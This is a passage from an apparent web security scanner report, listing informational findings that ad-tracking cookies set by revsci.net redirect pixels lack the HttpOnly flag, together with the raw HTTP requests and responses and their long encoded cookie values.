rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jzv8rD7yvDmvWDQ0Q8aZIAiDGSo49tlyo/qaXH5wQBQZoGx8vtub+wYEktHO6BM7/uLrdNXC7XGW2RoRccmRQldIeS8HXSTpZFxLggkcDjvNYOoGY5VZbYTnh36BiBOSmypBu+2iq2QDXMLkcK2uHT/C8yL+QzA9VXQB66zprk8rmpiNuQ+aVh/A47qdJNDn8qjknSHNRViyA6Lf9VLCsOvSBW/nO5bs5zsYbyjNLDs0tlY72ojd62XiPpxCcc3uKexC5DTRnhh3dyjVxPGSKlTmvlnr9aGHKHTLVK+Pbf8ptc5PMhhlo0YzcsATzNxrLbRoT3O3q8ARpCvgM02ra6StjkCMXHMHSO08i3XfCPZLjNdRaZogP3Ujafe16GMiz7s91qA4p5CB/lHJr+0KppLU7y9WBhmEa47Ru+ljaZ072rhbhEcmxw9qqLNU/Qhz9Jcu1BKQ80Yxf197S1IJ5HEjQj4x8ot9dp6PtQCbnIte0dkNtJgvyKbqABW/4Y9BTvL9lB5N3cnK0q0eAm7RmvrQsA06FWH3VQOB9HtLNz/xTbZK7hCVXAebPf6jRXHD0nkXRlRjiWS6ey6ODk7jWoiqPWwr+x2FHdnLpzowfuBuaZPFbrr5//T+tJPg0eKuCLr3R4K6PTUqHpej1AArZPQTL6FLqPQT4jVC3KzTCEGa4CaAnHY0Zrqs3d5iDVBUqwlTDxNfC7Ga9LeLy7/TcjcspKJyoaFh/2WC0jsAA3fEz6gj7U8mHA9cZFqj1IA6CoHNofMMWxvZ1EP/MiaMCqu1NxvqRz/nXou9NXXRguDHgUMu+z/yqY7XVxJWePCdb1p/q0Ew6qECQtyV6d8GNEFQloez/xBOOBcaKVasrabhh1mQhT1NABEEl0kGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GepXRxh4CCs9Y7SE/BWKnzNyBxrgIJBjNX2fpVDk9Qsy0jVeGn3pOqTP3l4YuJ1ioOHQT1JoRoJIKV4KRQq6Uzfq06fBDaJQf2kAQmgasQb39TGpsoAAZ5fvxckeQEMeOXTASaI1R/+6s3NCrVMLC7QIoUNHB/pGHS/OcquP8g8+avfDQBV+QwQIEjhL6Iy4vOheGZSgcslcOuTo9uMDkQcD4TrVKgsZIcfxEvv59B9klF63vqdAxxVxWmQS/tta5XA0ec/K359cVqOUV61/1Z4ODlvwuT29lxjH3/Y2sHLLMADwAXCR12/hlj15BfplbSqflcwddB3qetl5l4Zp7Z85bCzMG3I2xqoeKfJnKV+bExcZUxDS3oaeHUpFHUs4N5ehhFRt110WtEiM3U8HX32Gj4Hp80Y48x4dEhHIyopb6KyUupuEWF0HYN10tmN/yOvbv3JznYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHiTF000ztP6EaHxQuNUeUotUExw=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_VOiH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5DmhOQIMpzaB+ObIF/jP48EwcK1Pyjh1wToaxEY4MjPMAO+jEloOaeT+ClCZ8K45ygDTnjxwhq94NMNJq4Tcgas5n0NcPxVe97USo2pI1WIn4fNAZflkljVTFLMsGkDx3k7kPxSQ3uOH6E9DvqTJPQbXrXf2QP7Wq6hvgKCr69qwau1c1vbiVuzmKuX7y/N4V0bvZdiH8G2o6T0Z7JxaMyHOg5nEBqR8PIMVDM0fSVf5inkYhUyohUdQNSuLfHBKN2LnPDbLmbgHUpsRY9osDH1pVwXa1AHE8X63tgamDWicqxrlQvzssnWXDFilrD8XCM934PPpi0pHam4Yq1lJiQpKf5LKH9PGgszbgyu9neXj34GCfr6l1hGw2dYRPgCuug6mhyBWRUnadaavpk38mvGPL9qqRawnWmvg8aCwuMe0rasvuUpiskX1GlTgIfOz60o4ZdNsgisT5YYrZGWrioBH4Du7MJzXhOhp9u985+cyw7ALihpZcXaxyg5JuBdxcaJS4kFDmmsvWhkemOvM9TnhVQ97g3+qcjI=; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:12:32 GMT; Path=/
Set-Cookie: rtc_IiAg=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:12:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:12:31 GMT

13.43. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fwelcome&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_JXtz=MLsXtzE1ZxpnJ5GrHvmWF/KWrPo31Agpb5slCPedGNAwVTi74gkGz+Ioj4EWp+/DHqged2X1aG4UUDn9Sek+jWM8PzolTSqS7RsUjlJjpOBJV4OQhg8QGT4qzmd32wLpi/idGBjih+awrUoKWaJ0K1B1Lomb0QkvRD26c4T9RWug2cO4FjzKAUk/0qUcoDTyVussQkDgGXRawu/DgYy8AQYowPQYovmciLKxDbxy63oR0tY9ui/NiCYn/cnzTG4mUrhXRSpVst8UQQg9UDg0tgeixM8uBejqsKnVnMHc9P9FTM7x/ggwgrQzGUjVo6BefFXgFaQMIq+AXZcR/zpqBBsaLusDfUMdaCoeRbtAAVUE2mPvTEZu/93IB+zgKsSSVbDbVKROB1dqyeuXojAa7aHmb6eu+5ZmujQ0hRHn3xtEalcmuMeIg3WRnEijYtYALyQhp73E6VAmilQtoTPiNnBpnYBOsQoPgwgptLgSn07OG+jh5lrW7RTgIKy6MXkkmkQhCWZXO5mYNKzaRPm5xTNWXdC2579VbAg5n3aFD4xHuBpLc1V4ElYMePMZdeAdlgtT0E6Bx+Nlet6sPh5w2kN9EGCAsoXpjef+SbJ6yj1XtqK/Ti4AW2t0WrjxZ+ZdhqeYyX2/xogbUb/mgHumrix8fG9wK1NOIuNbpYW55sLR+aqooY9f7I2Zb0/Y4FhxjSKXWeh8Wap9wk65kZYLh9kAq0vrvz5Qi9Q/ZEgsrAd+fuTGh+Rs0UYPCj/jKhV2sOX+dhl0rauwPPPDupVHqmA11y8OaIDcpDa40Ec+aQmnD1Fg27ft7srSL4do5uyHD6m6pzT5gt/lh1IEBu7j624K+xXaxFrGmoe9um+HHVewxEiqK1yBPju68o7c4sEE6uv1R7tqhcphC80uE6bJsLcvZGgmVNLQoRmZu+19T6S/xFwIm0CESwJweNmTY93I8wQWuSkfvZPw3CXLkLuMOgDCuaebRsxiEO6Ve6CksLxbQx9Y5wo/Y6ljLXS6W8TuXPg8Ajn5DU+Gi7u6DUWdBc3GEgPZ4yACxIzv1Ht2Sa9lB0jhrHo/7Az8dBX7jueoWaMLanZ233NKdMdp+CJe8rutyK9A4GiO/JUhmI9K6dIDyOLSc4CAUt8mYfqlj3OYYg5jHXX8T05v6nQrJDyj95cvG4Z4jCeVWfvZ67L9q8UCKCd8w/lnvZvmyZKJJHPmUsWaIp/R8cDID5iXMFfc7AjdPWSXxeIYwJg9CwbkPsH6kXw8r0Oqf+XkEFay3UyruKRLC/1ue7DUS06B9fKLJFdj1f9LkA1cTpsnTLax8shJVlffoxUmGUzIDD92ECFG+DvSakohNl+OCiyZe+o3RcTToFAQ07UwbeMPaqA3lvSgwmqNpCpclQXSYtB1HznkXyZTA53rtFtSU+gRUvyL7AbO5Nev/zyDtnqcR5ujoU8PPUHYK7LfI3Ikvsuf5Q1AXNSohTIoIOj09vCTD62+I86CBu6sVVo=; rsi_segs_1000000=pUPFJDOBMHIQVvnT1blQz8+baFxQ8VBJwUYXJQfxR8hdOmO+AHY96MgE2HH6CmX/5rpwfY7JO7GQbw+x0vTTyYTOIx2ZJQQ/7c80AtQM4pGkI6RvQfdRIcsnFzpZRgLIoXYqKwe+54D5QS81AVhvtmcaRxnciyd6EdE0KeguIATF83m4/f+fVziCnRMgl7sqU6Sa/J1XXkPZFhQYsZKhWrt1Gbzoo/ewmDD+RJz5tk5lNRf6xXNYld1nrfSo0UrDLbRZGlm7wWl6ke0ppuq4f3sCZaCIs+ZXHUE9R/CQ81JHOuOaYMbo6FoCEApDFDL/NkhPqNg7IwVDZzGwWYTLw5QZqCfu/tPHcwDKvWbqxN2eclT+QlLzUIYvwEv/oWz8LDA27cJm1eotXrOMy0BE0BzCBgZ3AotZBRfFnYOtAXoRvXQ05vrGogWxJ3y9cmr3r8HOUQ78SAC4SkFLRSG1wnfyfgaBIAfgso/P/FaCOhhqzcCrUl+VnY9xUpqKk6LIxpYUKNIMDox6kXUjig==; rsiPus_aQJL="MLsXrlcNJj5noAC3RjxwrYCq5maHIXqV3bcut8jbjWMvRZsh039NS3Rk1DZ9FWcoweu30/kjxwVsyPDJfdB85DH9528gOB025UpRMepjnWmU5D8TIKUOcYbjUmShQ76UQ8O2Id1QrZKunr/oSaJPGUD1M2FfXarUHY3vg8ahPcCT3+YklIOYYWeOEs39aYwMH1Oyzh1cKZm6xWlsnVQK5XeKBwp21ZZle9CNzTsixFNNBKikWDt9n8zOQLOr2R52VBJU62U2bbxqnBQOF3XxuZopXc4sH3ZB08xsgmPeROBLf/pw2JM4T3NBA05x3I7F7WbAB0dj8okxKlhf6fEgxEAZUbMqj6JGIl7P5CAOGFhnHbvUKII41lYc0UedLRqTrY9QebpHRhrHwF3JXBfRoX1F7IMaWwNeWtqQQPBmAEJqR7mpbUrQY5Up8y7EjtHaDOlM3vgpaWsAYiPLvByGKWPmS09u1hcRmQmwQx5N2i7SWd1s9xtLLuXK6F+6bv2iZ8qFE71HT1Kkl+hS/Lg8ZUDNNMYrZPbgIaodojTtwp2b3LGlPywHAt7VDW/DAZuseSIyU4XW5eFPyz1Y6yrhpERI2Vik8hEbsQ8B8v87bEW13Rt13SX+mcaYE5siAUoco0Vq0+dX7hBHmJpHm33cECAnbFJyK50UHkwzt+c2nKU6KGuxY/oigNYJTV/sTm1adr+u7qtftuRwvDTeycarJ5BVmeTth8ruRZ1LgSNT/fpZx8Q4MvMQduiArZ4nRHmKTuHSvs2hGnE7UjfV+u2IOo9ma1WP/A=="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkjytG2HRpKcZ9iWeqPjy9kUWtl6xHCau2KMfgIXcPB8e/BpyfjtTtphAROxiuC83s+lEsRUrjgTlU1Q6ETbocY99WQN8dgTYd2TIldE82taHLaxy+Nydj7bjxqRSEzydoNKcidj8e3cwbw247cKkh0bvF6cW05IwoxL3mn8eGwNjtE8wBzFJ246UcorTvpQmlUzFWkSAdzpSiAiPPsJIE8lbllqVolddNGM9UughUMVmJRRI4QxwiFiwtc6KIkleGTyQORbnreQFdhoy9tIXJDzDUrzQQPFg53TtcFU0IzSRyZT7Ysrwwl1bCknBlQyPjhUJ76l2w0sAMYL8wdNz8+XZcRcYKvvD/UrCKooUt/aj0R6J70YEugNGsaI/NdjyO0otwfzNbegXYLqm4kbsRDLCOaFswANa5kumj+Myz7WFxFbCzByPlnMLG/iRprYhnnkwcpoUb94vjivtXsRNU8sY+9nJ/GyK0btkNncXgdCWK6F6Oq130DYl7qVO7toWR/7nBkQRQIHLYme9RaVkdGxQWzXlbDG+28P2rHEEKz1Jjq3MinipUFDb/X+skn0RAc5T2sv30M4M6SF5um2GeWtPGlm5/Kb7BBThW/rN4hbbJoIkTzsbd8cjyEyF0/6eY8Ql2WYO/ugwtD3KZKjg5FVoYYefZZL5FOyh5daP5P/acL+xvjHz+q/GKm+7UEbKgyi9riSc6BmVdwLpaoKChjgmndfydm9Rp55qJhAVzniaZx4ZfHgIJVo9ZqKvelViCz7jBcU+V22aO+QATsHM3O7khIxKxUpkTaNd2kuV2SDDKynS7pV755LqyKqSMIL9wDkqmG7I+PrM991cy7UOrI9CvhRsR0dGASBwDlIzEsz74PHZLjOOmhUndtuC+D9t3Pq9su4Qx5Gs+t+I1W2txXTMTAcv2+R94m2kL+BDy7SPgGZGE0LncHJN7qYordxYyuPDkLDO+RTaY+dG9ss66V7iVeW1Vpey8S0+SwK+SzonThNqM/B2m/bV6ZSXYt/prvJB/MoIZP7SVL30KjWZ5/nCFvqlj310LdQdx0sQ7a5cozfA89Wdmx6jAkGQrp47QDxo74bzIxU7oFU3eB48wpYTTqzPon/N/QOCsyy2tlb0vJptzVJDknJSV4Q5JHz84YjU8xY+F+7133qycHPNZitpdKfZe0t1RvmPf+XiCaa8BsDly/gBuN8TvoXnO8CAEwaesRAiFwcVqRagT7jCCmYzHi3EpHSIU6iFVXHlFHEhbdShbrC6g1B1Dr34GmQRkEjan4C1Evhax4yYJfFg/As+UsUZxBW0pXt5DzJCs/6I4Jli5U0q36mqAAXwqUxTeVjFtUsmZcR5liY8B3SY9pZ48EVHSp+luF/CLoxOj2+gMyXe3zIStYnrdo0U="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JXtz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOBcXIQT7v8flOljrAByA1W2ycLqLUl+VNv9A50qQeW0skFhBnmOmk8I5Sv5jpQhg/tbnjpu0a1vDJXD1SJv2fw+YUoCsZRmCQYyjnQFQDPVfiYLeSoPxDBs89GWWbRUoRZrPYPRzYFf2oW7z9E4935niTvO+hYyvUJ1hgkhKNykF+vhgAdnVcJkCktu6nmYMKYawYH1F/48MplqIWwcaLdWmaEzzHPwetIIU2lYlRvocFcE+RZ2KpcEJnk9101BB6NGfIYAUGf/yKhVW1rd/ZDn9tF6IOq3XVfpE1UhIXsqIP9rU/vRi3jLsRImkwZBivcGp6uHDI9lnS3GwAVu7gA7+d5DMTENqoZ/IjON1RXfKvGmZx7O7dX3bM7oI8Wg/OsXxqY64Gif4tiuIhz8bG+ZiX+KDAuOz5aK2J0cQmkR84AGfLehIEAxq0AsT+jJ2fUX+YD3zP8MYqW0OmWuqOzqFtMMqkLXF9NCF+8uaR1J+sGfts/J0sUMhJc5ZpqSnmGEDLBLgx962RquibuFY7j; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:01:07 GMT; Path=/
Set-Cookie: rtc_2MY1=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:01:07 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:01:06 GMT

13.44. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5Dxxh